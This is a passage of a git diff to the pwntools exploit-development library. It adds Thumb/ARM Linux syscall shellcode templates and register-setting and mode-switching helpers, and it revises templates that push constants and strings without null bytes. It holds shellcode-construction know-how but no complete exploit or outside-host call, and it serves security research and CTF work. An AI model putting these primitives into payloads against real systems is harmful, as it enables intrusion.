000000000..9fcc8d96d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/timer_delete.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/thumb/linux/timer_getoverrun.asm new file mode 100644 index 000000000..f653646e2 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/thumb/linux/timer_gettime.asm new file mode 100644 index 000000000..803db40d6 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/timer_settime.asm b/pwnlib/shellcraft/templates/thumb/linux/timer_settime.asm new file mode 100644 index 000000000..d3cd9969e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/timer_settime.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/truncate.asm b/pwnlib/shellcraft/templates/thumb/linux/truncate.asm new file mode 100644 index 000000000..82d96f851 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/truncate64.asm b/pwnlib/shellcraft/templates/thumb/linux/truncate64.asm new file mode 100644 index 000000000..cf3aaf334 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ulimit.asm b/pwnlib/shellcraft/templates/thumb/linux/ulimit.asm new file mode 100644 index 000000000..16771c7d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ulimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/umask.asm b/pwnlib/shellcraft/templates/thumb/linux/umask.asm new file mode 100644 index 000000000..7a2d56ad4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/uname.asm b/pwnlib/shellcraft/templates/thumb/linux/uname.asm new file mode 100644 index 000000000..a03cd2f4d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/unlink.asm b/pwnlib/shellcraft/templates/thumb/linux/unlink.asm new file mode 100644 index 000000000..ec7983589 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/unlinkat.asm b/pwnlib/shellcraft/templates/thumb/linux/unlinkat.asm new file mode 100644 index 000000000..7dcc47472 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/unlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/unshare.asm b/pwnlib/shellcraft/templates/thumb/linux/unshare.asm new file mode 100644 index 000000000..31af0631d --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ustat.asm b/pwnlib/shellcraft/templates/thumb/linux/ustat.asm new file mode 100644 index 000000000..dc41ad6c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/utime.asm b/pwnlib/shellcraft/templates/thumb/linux/utime.asm new file mode 100644 index 000000000..1efb69d0f --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/utimensat.asm b/pwnlib/shellcraft/templates/thumb/linux/utimensat.asm new file mode 100644 index 000000000..2461b8052 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/utimes.asm b/pwnlib/shellcraft/templates/thumb/linux/utimes.asm new file mode 100644 index 000000000..a8ef731dc --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/vfork.asm b/pwnlib/shellcraft/templates/thumb/linux/vfork.asm new file mode 100644 index 000000000..1328183c1 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/vhangup.asm b/pwnlib/shellcraft/templates/thumb/linux/vhangup.asm new file mode 100644 index 000000000..6c13ec7eb --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/vhangup.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/vmsplice.asm b/pwnlib/shellcraft/templates/thumb/linux/vmsplice.asm new file mode 100644 index 000000000..6e2e558ef --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/wait4.asm b/pwnlib/shellcraft/templates/thumb/linux/wait4.asm new file mode 100644 index 000000000..3fe5fe470 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/waitid.asm b/pwnlib/shellcraft/templates/thumb/linux/waitid.asm new file mode 100644 index 000000000..4ae8c0f09 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/waitid.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/waitpid.asm b/pwnlib/shellcraft/templates/thumb/linux/waitpid.asm new file mode 100644 index 000000000..80a773a45 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/write.asm b/pwnlib/shellcraft/templates/thumb/linux/write.asm new file mode 100644 index 000000000..688111985 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/write.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/writev.asm b/pwnlib/shellcraft/templates/thumb/linux/writev.asm new file mode 100644 index 000000000..6dc63d5b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/writev.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/thumb/memcpy.asm b/pwnlib/shellcraft/templates/thumb/memcpy.asm new file mode 100644 index 000000000..250555c40 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/memcpy.asm @@ -0,0 +1,19 @@ +<% from pwnlib.shellcraft import thumb, pretty, common %> +<%docstring>Copies memory. + +Args: + dest: Destination address + src: Source address + n: Number of bytes + +<%page args="dest, src, n"/> +<% +memcpy_loop = common.label("memcpy_loop") +%> + /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ + ${thumb.setregs({'r4': dest, 'r1': src, 'r2': n})} +${memcpy_loop}: + ldrb r3, [r1], #1 + strb r3, [r4], #1 + subs r2, r2, #1 + bge ${memcpy_loop} diff --git a/pwnlib/shellcraft/templates/thumb/mov.asm b/pwnlib/shellcraft/templates/thumb/mov.asm index e09d05ed0..accea458e 100644 --- a/pwnlib/shellcraft/templates/thumb/mov.asm +++ b/pwnlib/shellcraft/templates/thumb/mov.asm @@ -1,6 +1,7 @@ <% - from pwnlib.shellcraft import common - from pwnlib import constants + from pwnlib.shellcraft import eval, common, pretty, okay, registers + from pwnlib.log import getLogger + from pwnlib.util import fiddling from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context %> <%page args="dst, src"/> @@ -17,47 +18,94 @@ Example: - >>> print shellcraft.thumb.mov('r1','r2').rstrip() - mov r1, r2 - >>> print shellcraft.thumb.mov('r1', 0).rstrip() - eor r1, r1 - >>> print shellcraft.thumb.mov('r1', 10).rstrip() - mov r1, #10 - >>> print shellcraft.thumb.mov('r1', 17).rstrip() - mov r1, #17 - >>> print shellcraft.thumb.mov('r1', 'r1').rstrip() - /* moving r1 into r1, but this is a no-op */ - >>> print shellcraft.thumb.mov('r1', 0xdead00ff).rstrip() - ldr r1, value_... - b value_..._after - value_...: .word 3735879935 - value_..._after: - >>> with context.local(os = 'linux'): - ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() - mov r1, #(SYS_execve) - >>> with context.local(os = 'freebsd'): - ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() - mov r1, #(SYS_execve) - >>> with context.local(os = 'linux'): - ... print shellcraft.thumb.mov('r1', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() - mov r1, #(PROT_READ | PROT_WRITE | PROT_EXEC) + >>> print shellcraft.thumb.mov('r1','r2').rstrip() + mov r1, r2 + >>> print shellcraft.thumb.mov('r1', 0).rstrip() + eor r1, r1 + >>> print shellcraft.thumb.mov('r1', 10).rstrip() + mov r1, #0xa + 1 + sub r1, r1, 1 + >>> print shellcraft.thumb.mov('r1', 17).rstrip() + mov r1, #0x11 + >>> print shellcraft.thumb.mov('r1', 'r1').rstrip() + /* moving r1 into r1, but this is a no-op */ + >>> print shellcraft.thumb.mov('r1', 512).rstrip() + mov r1, #0x200 + >>> print shellcraft.thumb.mov('r1', 0x10000001).rstrip() + mov r1, #(0x10000001 >> 28) + lsl r1, #28 + add r1, #(0x10000001 & 0xff) + >>> print shellcraft.thumb.mov('r1', 0xdead0000).rstrip() + mov r1, #(0xdead0000 >> 25) + lsl r1, #(25 - 16) + add r1, #((0xdead0000 >> 16) & 0xff) + lsl r1, #16 + >>> print shellcraft.thumb.mov('r1', 0xdead00ff).rstrip() + ldr r1, value_... + b value_..._after + value_...: .word 0xdead00ff + value_..._after: + >>> with context.local(os = 'linux'): + ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() + mov r1, #(SYS_execve) /* 0xb */ + >>> with context.local(os = 'freebsd'): + ... print shellcraft.thumb.mov('r1', 'SYS_execve').rstrip() + mov r1, #(SYS_execve) /* 0x3b */ + >>> with context.local(os = 'linux'): + ... print shellcraft.thumb.mov('r1', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() + mov r1, #(PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ <% -all_regs = ['r' + str(n) for n in range(16)] + ['sp', 'fp', 'pc', 'lr'] +log = getLogger(__name__) src_orig = src if isinstance(src, (str, unicode)): src = src.strip() - if src.lower() in all_regs: + if src.lower() in registers.arm: src = src.lower() else: with ctx.local(arch = 'thumb'): try: - src = constants.eval(src) + src = eval(src) except (AttributeError, ValueError): log.error("Could not figure out the value of %r" % src) return +# ARM has a mov-const-with-shift +# As long as the const fits in 8 bits, everything works out :) +def get_imm8_shift_ok(v): + v_bits = fiddling.bits(v) + retval = 0 + + if v == 0: + return 1 + + trailing_zeroes = v_bits[::-1].index(1) + leading_zeroes = v_bits.index(1) + width = len(v_bits) - leading_zeroes - trailing_zeroes + + if width > 8: + return 0 + + retval = v >> trailing_zeroes + + if width > 8 \ + or not okay(retval, bits=8) \ + or (width == 8 and 0 != (trailing_zeroes % 2)): + return 0 + + return retval + +positive_imm8_shift = False +negative_imm8_shift = False +srcn = None +if not src in registers.arm: + src = eval(src) + srcu = src & 0xffffffff + srcn = fiddling.negate(src + 1) + positive_imm8_shift = get_imm8_shift_ok(srcu) + negative_imm8_shift = get_imm8_shift_ok(srcn) + %> % if dst == src: /* moving ${src} into ${dst}, but this is a no-op */ @@ -70,8 +118,16 @@ if isinstance(src, (str, unicode)): %>\ %if srcu == 0: eor ${dst}, ${dst} - %elif srcu < 256: - mov ${dst}, #${src} + %elif srcu == 10: + mov ${dst}, #${pretty(src)} + 1 + sub ${dst}, ${dst}, 1 + %elif srcs == -10: + mov ${dst}, #${pretty(src)} + 1 + sub ${dst}, ${dst}, 1 + %elif positive_imm8_shift and srcu != 10: + mov ${dst}, #${pretty(src)} + %elif negative_imm8_shift and srcn != 10: + mvn ${dst}, #-${pretty(srcn)} %elif -256 < srcs < 0: eor ${dst}, ${dst} sub ${dst}, #${-srcs} @@ -83,11 +139,11 @@ if isinstance(src, (str, unicode)): %>\ %if (0xff << shift1) & src == src: %if shift1 < 4: - mov ${dst}, #${src >> shift1} + mov ${dst}, #(${pretty(src)} >> ${shift1}) lsl ${dst}, #4 - lsr ${dst}, #{4 - shift1} + lsr ${dst}, #(4 - ${shift1}) %else: - mov ${dst}, #${src >> shift1} + mov ${dst}, #(${pretty(src)} >> ${shift1}) lsl ${dst}, #${shift1} %endif %else: @@ -97,9 +153,9 @@ if isinstance(src, (str, unicode)): shift2 += 1 %>\ %if ((0xff << shift2) | 0xff) & src == src: - mov ${dst}, #${src >> shift2} + mov ${dst}, #(${pretty(src)} >> ${shift2}) lsl ${dst}, #${shift2} - add ${dst}, #${src & 0xff} + add ${dst}, #(${"%#x" % src} & 0xff) %else: <% shift3 = shift1 + 8 @@ -107,26 +163,26 @@ if isinstance(src, (str, unicode)): shift3 += 1 %>\ %if ((0xff << shift1) | (0xff << shift3)) & src == src: - mov ${dst}, #${src >> shift3} - lsl ${dst}, #${shift3 - shift1} - add ${dst}, #${(src >> shift1) & 0xff} + mov ${dst}, #(${pretty(src)} >> ${shift3}) + lsl ${dst}, #(${shift3} - ${shift1}) + add ${dst}, #((${pretty(src)} >> ${shift1}) & 0xff) lsl ${dst}, #${shift1} %else: <% id = common.label("value") - extra = '' + shift = False if (src & 0xff000000 == 0): + shift = True src = src | 0xff000000 - extra = '\n '.join([ - "lsl %s, #8" % dst, - "lsr %s, #8" % dst - ]) %>\ ldr ${dst}, ${id} b ${id}_after - ${id}: .word ${src} + ${id}: .word ${pretty(src)} ${id}_after: - ${extra} + %if shift: + lsl ${dst}, #8 + lsr ${dst}, #8 + %endif %endif %endif %endif diff --git a/pwnlib/shellcraft/templates/thumb/popad.asm b/pwnlib/shellcraft/templates/thumb/popad.asm new file mode 100644 index 000000000..a54f30d46 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/popad.asm @@ -0,0 +1,6 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring> +Pop all of the registers onto the stack which i386 popad does, +in the same order. + + pop {r0-r12} diff --git a/pwnlib/shellcraft/templates/thumb/push.asm b/pwnlib/shellcraft/templates/thumb/push.asm index 7057de000..5c0381adc 100644 --- a/pwnlib/shellcraft/templates/thumb/push.asm +++ b/pwnlib/shellcraft/templates/thumb/push.asm @@ -1,6 +1,6 @@ <% from pwnlib.util import packing - from pwnlib.shellcraft import thumb + from pwnlib.shellcraft import thumb, registers from pwnlib import constants from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context import re @@ -20,42 +20,46 @@ Args: Example: + >>> print pwnlib.shellcraft.thumb.push('r0').rstrip() + push {r0} >>> print pwnlib.shellcraft.thumb.push(0).rstrip() /* push 0 */ - eor r1, r1 - push {r1} + eor r7, r7 + push {r7} >>> print pwnlib.shellcraft.thumb.push(1).rstrip() /* push 1 */ - mov r1, #1 - push {r1} + mov r7, #1 + push {r7} >>> print pwnlib.shellcraft.thumb.push(256).rstrip() /* push 256 */ - mov r1, #1 - lsl r1, #8 - push {r1} - >>> with context.local(os = 'linux'): - ... print pwnlib.shellcraft.thumb.push('SYS_execve').rstrip() + mov r7, #0x100 + push {r7} + >>> print pwnlib.shellcraft.thumb.push('SYS_execve').rstrip() /* push 'SYS_execve' */ - mov r1, #11 - push {r1} + mov r7, #0xb + push {r7} >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.thumb.push('SYS_execve').rstrip() /* push 'SYS_execve' */ - mov r1, #59 - push {r1} + mov r7, #0x3b + push {r7} <% - value_orig = value - if isinstance(value, (str, unicode)): +value_orig = value +is_register = value in registers.arm + +if not is_register and isinstance(value, (str, unicode)): try: - with ctx.local(arch = 'thumb'): - value = constants.eval(value) - except (ValueError, AttributeError): - pass + with ctx.local(arch = 'thumb'): + value = constants.eval(value) + except (ValueError, AttributeError, NameError): + pass %> -% if isinstance(value, (int,long)): +% if is_register: + push {${value}} +% elif isinstance(value, (int,long)): /* push ${repr(value_orig)} */ ${re.sub(r'^\s*/.*\n', '', thumb.pushstr(packing.pack(value), False), 1)} % else: diff --git a/pwnlib/shellcraft/templates/thumb/pushad.asm b/pwnlib/shellcraft/templates/thumb/pushad.asm new file mode 100644 index 000000000..84d20bd67 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/pushad.asm @@ -0,0 +1,6 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring> +Push all of the registers onto the stack which i386 pushad does, +in the same order. + + push {r0-r12} diff --git a/pwnlib/shellcraft/templates/thumb/pushstr.asm b/pwnlib/shellcraft/templates/thumb/pushstr.asm index 2020912ec..123ad7653 100644 --- a/pwnlib/shellcraft/templates/thumb/pushstr.asm +++ b/pwnlib/shellcraft/templates/thumb/pushstr.asm @@ -2,7 +2,7 @@ from pwnlib.shellcraft import thumb from pwnlib.util import lists, packing %> -<%page args="string, append_null = True"/> +<%page args="string, append_null = True, register = 'r7'"/> <%docstring> Pushes a string onto the stack without using null bytes or newline characters. @@ -12,18 +12,25 @@ Args: append_null (bool): Whether to append a single NULL-byte before pushing. Examples: - >>>> with context.local(): - ... context.arch = 'thumb' - ... print enhex(asm(shellcraft.pushstr('Hello\nWorld!', True))) - 81ea010102b4dff8041001e0726c642102b4dff8041001e06f0a576f02b4dff8041001e048656c6c02b4 - >>>> with context.local(): - ... context.arch = 'thumb' - ... print enhex(asm(shellcraft.pushstr('', True))) - 81ea010102b4 - >>>> with context.local(): - ... context.arch = 'thumb' - ... print enhex(asm(shellcraft.pushstr('\x00', False))) - 81ea010102b4 + +Note that this doctest has two possibilities for the first result, depending +on your version of binutils. + + >>> enhex(asm(shellcraft.pushstr('Hello\nWorld!', True))) in [ + ... '87ea070780b4dff8047001e0726c642180b4dff8047001e06f0a576f80b4dff8047001e048656c6c80b4', + ... '87ea070780b4dff8067000f002b8726c642180b4dff8047000f002b86f0a576f80b4014f00f002b848656c6c80b4'] + True + >>> print shellcraft.pushstr('abc').rstrip() #doctest: +ELLIPSIS + /* push 'abc\x00' */ + ldr r7, value_... + b value_..._after + value_...: .word 0xff636261 + value_..._after: + lsl r7, #8 + lsr r7, #8 + push {r7} + >>> print enhex(asm(shellcraft.pushstr('\x00', False))) + 87ea070780b4 <% @@ -32,9 +39,12 @@ Examples: if not string: return + offset = len(string) + while offset % 4: + offset += 1 %>\ /* push ${repr(string)} */ % for word in lists.group(4, string, 'fill', '\x00')[::-1]: - ${thumb.mov('r1', packing.unpack(word))} - push {r1} + ${thumb.mov(register, packing.unpack(word))} + push {${register}} % endfor diff --git a/pwnlib/shellcraft/templates/thumb/setregs.asm b/pwnlib/shellcraft/templates/thumb/setregs.asm new file mode 100644 index 000000000..dc01551c8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/setregs.asm @@ -0,0 +1,43 @@ +<% + from pwnlib.regsort import regsort + from pwnlib.constants import Constant, eval + from pwnlib.shellcraft import registers + from pwnlib.shellcraft.thumb import mov +%> +<%page args="reg_context, stack_allowed = True"/> +<%docstring> +Sets multiple registers, taking any register dependencies into account +(i.e., given eax=1,ebx=eax, set ebx first). + +Args: + reg_context (dict): Desired register context + stack_allowed (bool): Can the stack be used? + +Example: + + >>> print shellcraft.setregs({'r0':1, 'r2':'r3'}).rstrip() + mov r0, #1 + mov r2, r3 + >>> print shellcraft.setregs({'r0':'r1', 'r1':'r0', 'r2':'r3'}).rstrip() + mov r2, r3 + eor r0, r0, r1 /* xchg r0, r1 */ + eor r1, r0, r1 + eor r0, r0, r1 + +<% +reg_context = {k:v for k,v in reg_context.items() if v is not None} +sorted_regs = regsort(reg_context, registers.arm) +%> +% if not sorted_regs: + /* setregs noop */ +% else: +% for how, dst, src in regsort(reg_context, registers.arm): +% if how == 'xchg': + eor ${dst}, ${dst}, ${src} /* xchg ${dst}, ${src} */ + eor ${src}, ${dst}, ${src} + eor ${dst}, ${dst}, ${src} +% else: + ${mov(dst, src)} +% endif +% endfor +% endif diff --git a/pwnlib/shellcraft/templates/thumb/to_arm.asm b/pwnlib/shellcraft/templates/thumb/to_arm.asm new file mode 100644 index 000000000..604cba285 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/to_arm.asm @@ -0,0 +1,23 @@ +<% + from random import choice + from pwnlib.shellcraft import registers +%> +<%docstring>Go from THUMB to ARM mode. +<%page args="reg=None, avoid = []"/> +<% + if reg: + pass + elif not avoid or 'r3' not in avoid: + reg = 'r3' + else: + # Avoid registers we don't want to clobber, and r0 + # since it will encode a NULL. + avoid = set(avoid) | {'r0', 'sp', 'pc', 'cpsr', 'lr'} + reg = next(r for r in registers.arm if r not in avoid) +%> + .thumb + add ${reg}, pc, #4 + bx ${reg} + nop + .arm + diff --git a/pwnlib/shellcraft/templates/thumb/trap.asm b/pwnlib/shellcraft/templates/thumb/trap.asm new file mode 100644 index 000000000..d9c40dcf5 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/trap.asm @@ -0,0 +1,2 @@ +<%docstring>A trap instruction. + BKPT diff --git a/pwnlib/shellcraft/templates/thumb/udiv_10.asm b/pwnlib/shellcraft/templates/thumb/udiv_10.asm new file mode 100644 index 000000000..d32b72729 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/udiv_10.asm @@ -0,0 +1,18 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft import arm +%> +<%page args="N"/> +<%docstring> +Divides r0 by 10. Result is stored in r0, N and Z flags are updated. + +Code is from generated from here: + https://raw.githubusercontent.com/rofirrim/raspberry-pi-assembler/master/chapter15/magic.py + +With code: + python magic.py 10 code_for_unsigned + + /* r0 = ${N} / 10 */ + ${arm.setregs({'r0': N, 'r1': 0xcccccccd})} + umull r1, r2, r0, r1 /* r1 <- Lower32Bits(r1*r0). r2 <- Upper32Bits(r1*r0) */ + movs r0, r2, LSR #3 /* r0 <- r2 >> 3 */ diff --git a/pwnlib/tubes/process.py b/pwnlib/tubes/process.py index d16154535..e494be0f1 100644 --- a/pwnlib/tubes/process.py +++ b/pwnlib/tubes/process.py @@ -352,12 +352,18 @@ def kill(self): self.close() - def poll(self): - """poll() -> int + def poll(self, block = False): + """poll(block = False) -> int + + Arguments: + block(bool): Wait for the process to exit Poll the exit code of the process. Will return None, if the process has not yet finished and the exit code otherwise. """ + if block: + self.wait_for_close() + self.proc.poll() if self.proc.returncode != None and not self._stop_noticed: self._stop_noticed = True diff --git a/pwnlib/tubes/tube.py b/pwnlib/tubes/tube.py index 212ed584e..6ccdeb273 100644 --- a/pwnlib/tubes/tube.py +++ b/pwnlib/tubes/tube.py @@ -228,8 +228,8 @@ def recvn(self, numb, timeout = default): >>> t.recv_raw = lambda *a: time.sleep(0.01) or 'a' >>> t.recvn(10, timeout=0.05) '' - >>> t.recvn(10, timeout=0.05) - 'aaaaaaaaaa' + >>> t.recvn(10, timeout=0.06) # doctest: +ELLIPSIS + 'aaaaaa...' """ # Keep track of how much data has 